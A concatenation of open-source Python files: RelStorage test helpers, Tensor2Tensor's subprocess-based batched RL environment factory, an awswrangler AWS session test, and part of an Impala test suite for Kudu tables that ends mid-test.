# files that are still open, and zope.testing.setupstack
# was asked to remove the temp dir as part of tearing itself down;
# cleanups run after tearDown runs (which is when the setupstack runs.)
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not none so we don't try to create.
super(AbstractToFileStorage, self).tearDown()
def new_dest(self):
return self._closing(FileStorage(self._dst_path))
class AbstractFromFileStorage(RelStorageTestBase):
# As for AbstractToFileStorage
def setUp(self):
super(AbstractFromFileStorage, self).setUp()
self._src_path = os.path.abspath(self.rs_temp_prefix + 'Source.fs')
self.__dst = None
def make_storage_to_cache(self):
return FileStorage(self._src_path, create=True)
@property
def _dst(self):
if self.__dst is None:
self.__dst = self.make_storage()
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not none so we don't try to create.
super(AbstractFromFileStorage, self).tearDown()
def new_dest(self):
return self._dst
|
batch_env_factory.py
|
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for creating batched environments."""
# The code was based on Danijar Hafner's code from tf.agents:
# https://github.com/tensorflow/agents/blob/master/agents/tools/wrappers.py
# https://github.com/tensorflow/agents/blob/master/agents/scripts/utility.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import multiprocessing
import os
import random
import signal
import subprocess
import sys
import traceback
from tensor2tensor.rl.envs import batch_env
from tensor2tensor.rl.envs import py_func_batch_env
from tensor2tensor.rl.envs import simulated_batch_env
import tensorflow as tf
def batch_env_factory(environment_spec, num_agents,
initial_frame_chooser=None, xvfb=False):
"""Factory of batch envs."""
if environment_spec.simulated_env:
cur_batch_env = _define_simulated_batch_env(
environment_spec, num_agents, initial_frame_chooser)
else:
cur_batch_env = _define_batch_env(environment_spec, num_agents, xvfb=xvfb)
return cur_batch_env
def _define_batch_env(environment_spec, num_agents, xvfb=False):
"""Create environments and apply all desired wrappers."""
with tf.variable_scope("environments"):
envs = [
ExternalProcessEnv(environment_spec.env_lambda, xvfb)
for _ in range(num_agents)]
env = batch_env.BatchEnv(envs, blocking=False)
env = py_func_batch_env.PyFuncBatchEnv(env)
return env
def _define_simulated_batch_env(environment_spec, num_agents,
initial_frame_chooser):
cur_batch_env = simulated_batch_env.SimulatedBatchEnv(
environment_spec, num_agents, initial_frame_chooser
)
return cur_batch_env
class ExternalProcessEnv(object):
"""Step environment in a separate process for lock free parallelism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
_ATTRIBUTE_EXCEPTION = 6
def __init__(self, constructor, xvfb):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
xvfb: Frame buffer.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._constructor = constructor
self._conn, conn = multiprocessing.Pipe()
if xvfb:
server_id = random.randint(10000, 99999)
auth_file_id = random.randint(10000, 99999999999)
xauthority_path = "/tmp/Xauthority_{}".format(auth_file_id)
command = "Xvfb :{} -screen 0 1400x900x24 -nolisten tcp -auth {}".format(
server_id, xauthority_path)
with open(os.devnull, "w") as devnull:
proc = subprocess.Popen(command.split(), shell=False, stdout=devnull,
stderr=devnull)
atexit.register(lambda: os.kill(proc.pid, signal.SIGKILL))
def constructor_using_xvfb():
os.environ["DISPLAY"] = ":{}".format(server_id)
os.environ["XAUTHORITY"] = xauthority_path
return constructor()
self._process = multiprocessing.Process(
target=self._worker, args=(constructor_using_xvfb, conn))
else:
self._process = multiprocessing.Process(
target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
def __str__(self):
return "ExternalProcessEnv(%s)" % str(self._constructor)
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__("observation_space")
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__("action_space")
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call("step", action)
if blocking:
return promise()
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call("reset")
if blocking:
return promise()
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._ATTRIBUTE_EXCEPTION:
raise AttributeError(payload)
if message == self._RESULT:
return payload
raise KeyError("Received message of unexpected type {}".format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
try:
result = getattr(env, name)
conn.send((self._RESULT, result))
except AttributeError as err:
conn.send((self._ATTRIBUTE_EXCEPTION, err.args))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
env.close()
break
raise KeyError("Received message of unknown type {}".format(message))
except Exception: # pylint: disable=broad-except
stacktrace = "".join(traceback.format_exception(*sys.exc_info())) # pylint: disable=no-value-for-parameter
tf.logging.error("Error in environment process: {}".format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
|
test_session.py
|
import multiprocessing as mp
import logging
import pytest
from awswrangler import Session
logging.basicConfig(level=logging.INFO, format="[%(asctime)s][%(levelname)s][%(name)s][%(funcName)s] %(message)s")
logging.getLogger("awswrangler").setLevel(logging.DEBUG)
def assert_account_id(session):
account_id = (session.boto3_session.client("sts").get_caller_identity().get("Account"))
assert type(account_id) == str
@pytest.fixture(scope="module")
def default_session():
yield Session()
def test_session(default_session):
assert_account_id(default_session)
def test_session_region():
assert_account_id(Session(region_name="us-east-1"))
def test_from_boto3_session(default_session):
assert_account_id(Session(boto3_session=default_session.boto3_session))
def test_from_boto3_keys(default_session):
assert_account_id(
Session(
aws_access_key_id=default_session.aws_access_key_id,
aws_secret_access_key=default_session.aws_secret_access_key,
))
def test_from_boto3_region_name(default_session):
assert_account_id(Session(region_name=default_session.region_name))
def test_cpu_count():
assert_account_id(Session(procs_cpu_bound=1, procs_io_bound=1, botocore_max_retries=1))
def get_account_id_remote(primitives, account_id):
account_id.value = (primitives.session.boto3_session.client("sts").get_caller_identity().get("Account"))
def test_multiprocessing(default_session):
primitives = default_session.primitives
account_id = mp.Manager().Value(typecode=str, value=None)
proc = mp.Process(target=get_account_id_remote, args=(primitives, account_id))
proc.start()
proc.join()
assert type(account_id.value) == str
|
test_kudu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from kudu.schema import (
BOOL,
DOUBLE,
FLOAT,
INT16,
INT32,
INT64,
INT8,
SchemaBuilder,
STRING,
BINARY,
UNIXTIME_MICROS)
from kudu.client import Partitioning
import logging
import pytest
import random
import textwrap
import threading
import time
from datetime import datetime
from pytz import utc
from tests.common.kudu_test_suite import KuduTestSuite
from tests.common.impala_cluster import ImpalaCluster
from tests.common.skip import SkipIfNotHdfsMinicluster, SkipIfKudu
from tests.common.test_dimensions import add_exec_option_dimension
from tests.verifiers.metric_verifier import MetricVerifier
KUDU_MASTER_HOSTS = pytest.config.option.kudu_master_hosts
LOG = logging.getLogger(__name__)
# TODO(IMPALA-8614): parameterize some tests to run with HMS integration enabled.
class TestKuduOperations(KuduTestSuite):
"""
This suite tests the different modification operations when using a kudu table.
"""
@classmethod
def add_test_dimensions(cls):
super(TestKuduOperations, cls).add_test_dimensions()
# The default read mode of READ_LATEST does not provide high enough consistency for
# these tests.
add_exec_option_dimension(cls, "kudu_read_mode", "READ_AT_SNAPSHOT")
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_out_of_range_timestamps(self, vector, cursor, kudu_client, unique_database):
"""Test timestamp values that are outside of Impala's supported date range."""
cursor.execute("""CREATE TABLE %s.times (a INT PRIMARY KEY, ts TIMESTAMP)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "times"))
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "times"))
session = kudu_client.new_session()
session.apply(table.new_insert((0, datetime(1987, 5, 19, 0, 0, tzinfo=utc))))
# Add a date before 1400
session.apply(table.new_insert((1, datetime(1300, 1, 1, 0, 0, tzinfo=utc))))
# TODO: Add a date after 9999. There isn't a way to represent a date greater than
# 9999 in Python datetime.
#session.apply(table.new_insert((2, datetime(12000, 1, 1, 0, 0, tzinfo=utc))))
session.flush()
# TODO: The test driver should have a way to specify query options in an 'options'
# section rather than having to split abort_on_error cases into separate files.
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/kudu-overflow-ts', vector,
use_db=unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/kudu-overflow-ts-abort-on-error', vector,
use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_scan_node(self, vector, unique_database):
self.run_test_case('QueryTest/kudu-scan-node', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_insert(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_insert', vector, use_db=unique_database)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@SkipIfKudu.no_hybrid_clock
def test_kudu_insert_mem_limit(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_insert_mem_limit', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_update(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_update', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_upsert(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_upsert', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_delete(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_delete', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_partition_ddl(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_partition_ddl', vector, use_db=unique_database)
@pytest.mark.execute_serially
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_kudu_alter_table(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_alter', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_stats(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_stats', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_describe(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_describe', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_limit(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_limit', vector, use_db=unique_database)
def test_kudu_column_options(self, cursor, kudu_client, unique_database):
"""Test Kudu column options"""
encodings = ["ENCODING PLAIN_ENCODING", ""]
compressions = ["COMPRESSION SNAPPY", ""]
nullability = ["NOT NULL", "NULL", ""]
defaults = ["DEFAULT 1", ""]
blocksizes = ["BLOCK_SIZE 32768", ""]
indx = 1
for encoding in encodings:
for compression in compressions:
for default in defaults:
for blocksize in blocksizes:
for nullable in nullability:
impala_tbl_name = "test_column_options_%s" % str(indx)
cursor.execute("""CREATE TABLE %s.%s (a INT PRIMARY KEY
%s %s %s %s, b INT %s %s %s %s %s) PARTITION BY HASH (a)
PARTITIONS 3 STORED AS KUDU""" % (unique_database, impala_tbl_name,
encoding, compression, default, blocksize, nullable, encoding,
compression, default, blocksize))
indx = indx + 1
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, impala_tbl_name))
def test_kudu_col_changed(self, cursor, kudu_client, unique_database):
"""Test changing a Kudu column outside of Impala results in a failure on read with
outdated metadata (IMPALA-4828)."""
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "int32")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, i))
session.apply(op)
session.flush()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert False
except Exception as e:
expected_error = "Column 's' is type INT but Impala expected STRING. The table "\
"metadata in Impala may be outdated and need to be refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
def test_kudu_col_not_null_changed(self, cursor, kudu_client, unique_database):
"""Test changing a NOT NULL Kudu column outside of Impala results in a failure
on read with outdated metadata (IMPALA-4828)."""
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING NOT NULL)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "string", nullable=True)
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, None))
session.apply(op)
session.flush()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert False
except Exception as e:
expected_error = "Column 's' is nullable but Impala expected it to be "\
"not nullable. The table metadata in Impala may be outdated and need to be "\
"refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
def test_kudu_col_null_changed(self, cursor, kudu_client, unique_database):
"""Test changing a NULL Kudu column outside of Impala results in a failure
on read with outdated metadata (IMPALA-4828)."""
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING NULL)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "string", nullable=False, default="bar")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, "foo"))
session.apply(op)
session.flush()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert False
except Exception as e:
expected_error = "Column 's' is not nullable but Impala expected it to be "\
"nullable. The table metadata in Impala may be outdated and need to be "\
"refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
def test_kudu_col_added(self, cursor, kudu_client, unique_database):
"""Test adding a Kudu column outside of Impala."""
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and add a new col
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("b", "int32")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
op = table.new_insert((0, 0))
session.apply(op)
session.flush()
# Only the first col is visible to Impala. Impala will not know about the missing
# column, so '*' is expanded to known columns. This doesn't have a separate check
# because the query can proceed and checking would need to fetch metadata from the
# Kudu master, which is what REFRESH is for.
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cursor.fetchall() == [(0, )]
# After a REFRESH both cols should be visible
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cursor.fetchall() == [(0, 0)]
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_kudu_col_removed(self, cursor, kudu_client, unique_database):
"""Test removing a Kudu column outside of Impala."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
cursor.execute("insert into %s.foo values (0, 'foo')" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
except Exception as e:
expected_error = "Column 's' not found in kudu table impala::test_kudu_col_removed"
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cursor.fetchall() == [(0, )]
def test_kudu_show_unbounded_range_partition(self, cursor, kudu_client,
unique_database):
"""Check that a single unbounded range partition gets printed correctly."""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
name = unique_database + ".unbounded_range_table"
try:
kudu_client.create_table(name, schema,
partitioning=Partitioning().set_range_partition_columns(["id"]))
kudu_table = kudu_client.table(name)
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("SHOW RANGE PARTITIONS %s" % impala_table_name)
assert cursor.description == [
('RANGE (id)', 'STRING', None, None, None, None, None)]
assert cursor.fetchall() == [('UNBOUNDED',)]
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.no_hybrid_clock
def test_column_storage_attributes(self, cursor, unique_database):
"""Tests that for every valid combination of column type, encoding, and compression,
we can insert a value and scan it back from Kudu."""
# This test takes about 2min and is unlikely to break, so only run it in exhaustive.
if self.exploration_strategy() != 'exhaustive':
pytest.skip("Only runs in exhaustive to reduce core time.")
table_name = "%s.storage_attrs" % unique_database
types = ['boolean', 'tinyint', 'smallint', 'int', 'bigint', 'float', 'double', \
'string', 'timestamp', 'decimal']
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
create_query = "create table %s (id int primary key" % table_name
for t in types:
create_query += ", %s_col %s" % (t, t)
create_query += ") partition by hash(id) partitions 16 stored as kudu"
cursor.execute(create_query)
encodings = ['AUTO_ENCODING', 'PLAIN_ENCODING', 'PREFIX_ENCODING', 'GROUP_VARINT', \
'RLE', 'DICT_ENCODING', 'BIT_SHUFFLE']
compressions = ['DEFAULT_COMPRESSION', 'NO_COMPRESSION', 'SNAPPY', 'LZ4', 'ZLIB']
i = 0
for e in encodings:
for c in compressions:
for t in types:
try:
cursor.execute("""alter table %s alter column %s_col
set encoding %s compression %s""" % (table_name, t, e, c))
except Exception as err:
assert "encoding %s not supported for type" % e in str(err)
cursor.execute("""insert into %s values (%s, true, 0, 0, 0, 0, 0, 0, '0',
cast('2009-01-01' as timestamp), cast(0 as decimal))""" % (table_name, i))
cursor.execute("select * from %s where id = %s" % (table_name, i))
assert cursor.fetchall() == \
[(i, True, 0, 0, 0, 0, 0.0, 0.0, '0', datetime(2009, 1, 1, 0, 0), 0)]
i += 1
cursor.execute("select count(*) from %s" % table_name)
print cursor.fetchall() == [(i, )]
def test_concurrent_schema_change(self, cursor, unique_database):
"""Tests that an insert into a Kudu table with a concurrent schema change either
succeeds or fails gracefully."""
table_name = "%s.test_schema_change" % unique_database
cursor.execute("""create table %s (col0 bigint primary key, col1 bigint)
partition by hash(col0) partitions 16 stored as kudu""" % table_name)
iters = 5
def insert_values():
threading.current_thread().errors = []
client = self.create_impala_client()
for i in range(0, iters):
time.sleep(random.random()) # sleeps for up to one second
try:
client.execute("insert into %s values (0, 0), (1, 1)" % table_name)
except Exception as e:
threading.current_thread().errors.append(e)
insert_thread = threading.Thread(target=insert_values)
insert_thread.start()
for i in range(0, iters):
time.sleep(random.random()) # sleeps for up to one second
cursor.execute("alter table %s drop column col1" % table_name)
if i % 2 == 0:
cursor.execute("alter table %s add columns (col1 string)" % table_name)
else:
cursor.execute("alter table %s add columns (col1 bigint)" % table_name)
insert_thread.join()
for error in insert_thread.errors:
msg = str(error)
# The first two are AnalysisExceptions, the next two come from KuduTableSink::Open()
# if the schema has changed since analysis, the rest come from the Kudu server if
# the schema changes between KuduTableSink::Open() and when the write ops are sent.
possible_errors = [
"has fewer columns (1) than the SELECT / VALUES clause returns (2)",
"(type: TINYINT) is not compatible with column 'col1' (type: STRING)",
"has fewer columns than expected.",
"Column col1 has unexpected type.",
"Client provided column col1[int64 NULLABLE] not present in tablet",
"Client provided column col1 INT64 NULLABLE not present in tablet",
"The column 'col1' must have type string NULLABLE found int64 NULLABLE"
]
assert any(err in msg for err in possible_errors)
def _retry_query(self, cursor, query, expected):
retries = 0
while retries < 3:
cursor.execute(query)
result = cursor.fetchall()
if result == expected:
break
retries += 1
time.sleep(1)
assert retries < 3, \
"Did not get a correct result for %s after 3 retries: %s" % (query, result)
def test_read_modes(self, cursor, unique_database):
"""Other Kudu tests are run with a scan level of READ_AT_SNAPSHOT to have predicable
scan results. This test verifies that scans work as expected at the scan level of
READ_LATEST by retrying the scan if the results are incorrect."""
table_name = "%s.test_read_latest" % unique_database
cursor.execute("set kudu_read_mode=READ_LATEST")
cursor.execute("""create table %s (a int primary key, b string) partition by hash(a)
partitions 8 stored as kudu""" % table_name)
cursor.execute("insert into %s values (0, 'a'), (1, 'b'), (2, 'c')" % table_name)
self._retry_query(cursor, "select * from %s order by a" % table_name,
[(0, 'a'), (1, 'b'), (2, 'c')])
cursor.execute("""insert into %s select id, string_col from functional.alltypes
where id > 2 limit 100""" % table_name)
self._retry_query(cursor, "select count(*) from %s" % table_name, [(103,)])
class TestCreateExternalTable(KuduTestSuite):
@SkipIfKudu.hms_integration_enabled
def test_external_timestamp_default_value(self, cursor, kudu_client, unique_database):
"""Checks that a Kudu table created outside Impala with a default value on a
UNIXTIME_MICROS column can be loaded by Impala, and validates the DESCRIBE
output is correct."""
schema_builder = SchemaBuilder()
column_spec = schema_builder.add_column("id", INT64)
column_spec.nullable(False)
column_spec = schema_builder.add_column("ts", UNIXTIME_MICROS)
column_spec.default(datetime(2009, 1, 1, 0, 0, tzinfo=utc))
schema_builder.set_primary_keys(["id"])
schema = schema_builder.build()
name = unique_database + ".tsdefault"
try:
kudu_client.create_table(name, schema,
partitioning=Partitioning().set_range_partition_columns(["id"]))
kudu_table = kudu_client.table(name)
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
table_desc = [[col.strip() if col else col for col in row] for row in cursor]
# Pytest shows truncated output on failure, so print the details just in case.
LOG.info(table_desc)
assert ["ts", "timestamp", "", "false", "true", "1230768000000000", \
"AUTO_ENCODING", "DEFAULT_COMPRESSION", "0"] in table_desc
finally:
if kudu_client.table_exists(name):
kudu_client.delete_table(name)
@SkipIfKudu.hms_integration_enabled
def test_implicit_table_props(self, cursor, kudu_client):
"""Check that table properties added internally during table creation are as
expected.
"""
with self.temp_kudu_table(kudu_client, [STRING, INT8, BOOL], num_key_cols=2) \
as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE FORMATTED %s" % impala_table_name)
table_desc = [[col.strip() if col else col for col in row] for row in cursor]
LOG.info(table_desc)
# Pytest shows truncated output on failure, so print the details just in case.
assert ["", "EXTERNAL", "TRUE"] in table_desc
assert ["", "kudu.master_addresses", KUDU_MASTER_HOSTS] in table_desc
assert ["", "kudu.table_name", kudu_table.name] in table_desc
assert ["", "storage_handler", "org.apache.hadoop.hive.kudu.KuduStorageHandler"] \
in table_desc
@SkipIfKudu.hms_integration_enabled
def test_col_types(self, cursor, kudu_client):
"""Check that a table can be created using all available column types."""
# TODO: Add DECIMAL when the Kudu python client supports decimal
kudu_types = [STRING, BOOL, DOUBLE, FLOAT, INT16, INT32, INT64, INT8]
with self.temp_kudu_table(kudu_client, kudu_types) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
props))
with self.drop_impala_table_after_context(cursor, impala_table_name):
cursor.execute("DESCRIBE %s" % impala_table_name)
kudu_schema = kudu_table.schema
for i, (col_name, col_type, _, _, _, _, _, _, _) in enumerate(cursor):
kudu_col = kudu_schema[i]
assert col_name == kudu_col.name
assert col_type.upper() == \
self.kudu_col_type_to_impala_col_type(kudu_col.type.type)
@SkipIfKudu.hms_integration_enabled
def test_unsupported_binary_col(self, cursor, kudu_client):
"""Check that external tables with BINARY columns fail gracefully.
"""
with self.temp_kudu_table(kudu_client, [INT32, BINARY]) as kudu_table:
impala_table_name = self.random_table_name()
try:
cursor.execute("""
CREATE EXTERNAL TABLE %s
STORED AS KUDU
TBLPROPERTIES('kudu.table_name' = '%s')""" % (impala_table_name,
kudu_table.name))
assert False
except Exception as e:
assert "Kudu type 'binary' is not supported in Impala" in str(e)
@SkipIfKudu.hms_integration_enabled
def test_drop_external_table(self, cursor, kudu_client):
"""Check that dropping an external table only affects the catalog and does not delete
the table in Kudu.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
